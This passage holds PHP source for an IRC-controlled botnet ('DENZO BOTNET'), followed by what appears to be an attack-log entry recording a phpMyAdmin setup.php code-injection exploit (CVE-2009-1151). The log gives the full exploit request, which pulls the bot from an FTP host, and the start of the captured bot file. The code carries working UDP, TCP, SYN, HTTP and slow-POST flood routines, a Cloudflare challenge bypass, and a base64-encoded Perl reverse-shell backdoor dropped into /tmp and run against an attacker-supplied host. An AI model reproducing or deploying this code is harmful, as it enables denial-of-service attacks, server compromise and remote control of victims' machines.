$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttp host port time [method] [url]");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
public function set_nick() {
$fp = fsockopen("freegeoip.app", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[BR]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.app/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[BR]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
$nicky=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
$this->nick1 = $nicky[rand(0,count($nicky) - 1)];
$this->nick2 = $nicky[rand(0,count($nicky) - 1)];
$this->nick3 = $nicky[rand(0,count($nicky) - 1)];
$this->nick4 = $nicky[rand(0,count($nicky) - 1)];
$this->nick5 = $nicky[rand(0,count($nicky) - 1)];
$this->nick6 = $nicky[rand(0,count($nicky) - 1)];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->send("NICK " . $this->nick);
$this->send("NICK ".$this->nick.$this->nick1.$this->nick2.$this->nick3.$this->nick4.$this->nick5.$this->nick6."");
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"\2[\2DENZO BOTNET | * UDPFLOOD ATACAR EM CURSO SOBRE: $host !!!\2]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | $env MB enviados / Media: $vel mbp/s launch\2]\2");
}
//////////// Rudy Flood Added by Hax Stroke
function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2Rudy Flood Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Rudy Flood Finished!\2]");
}
function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JS-BYPASS ATTACKING $host:$port FOR $time WITH $method METHOD ON THE $url PATH !!!\2]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare Detected !\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2JSBYPASS METHOD BY DENZELHAX ATTACKING !\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JSBYPASS STOPPING ON $host !!!\2]\2");
}
////////////
//////////// UDP FLOOD VERSION 2.0 ADDED BY HAX STROKE
function udpfloodv2($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | * MASSUDP ATACAR EM CURSO SOBRE: $host:$port !!!\2]\2");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "04Ataque Finalizado Com Sucesso!");
}
////////////
function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
/////////////
function HTTP_Flood( $host , $page , $length )
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing $host on $page path with $length lenght - Disconnected...]\2");
if ( $page == '' )
{
$page = '/';
}
$max_time = time() + $length;
$packet .= 'GET ' . $page . ' HTTP/1.1' . "\r\n";
$packet .= 'Host: ' . $host . "\r\n";
$packet .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0b7) Gecko/20100101 Firefox/4.0b7' . "\r\n";
$packet .= 'Keep-alive: 300' . "\r\n";
$packet .= 'Connection: keep-alive' . "\r\n\r\n";
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
while( 1 )
{
if ( time() > $max_time )
{
break;
}
if( $fp )
{
fwrite( $fp , $packet );
fclose( $fp );
$packets++;
}
else
{
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
}
}
if ( $packets == 0 )
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],'<br /><b>An error occurred! Could not send packets.</b><br />' . "\n");
}
else
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],$host) ;
$this->privmsg($this->config['chan'],$length) ;
$this->privmsg($this->config['chan'],'<b>Packets:</b> ' . round($packets) . ' ( ' . round($packets/$length) . ' packets/s ) <br />' . "\n");
}
return 0;
}
////////////
function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
////////////
function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Killing $host:$port for $time - Disconnected...]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Finished ! - Connected...]\2");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing TCP Connection $host:$port - Disconnected...]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNr ? IEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0 ? XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4i ? Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQg ? PSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHBy ? b3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZF ? UiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsN ? Cm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAi ? U25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIp ? Ow0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVu ? KFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERF ? UlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBl ?eGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$bot = new pBot;
$bot->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.110.227.41
Dest. port: 80
Time: 05/10/2019 20:13:47
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 234
cookie2: $Version="1"
Host: 103.234.147.129
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://103.234.147.129/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 91e62db93324cf2680b117e568cf6df0
Type: text/x-php
Size: 41796
URL: ftp://95.110.227.41/bot.php
<?php
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
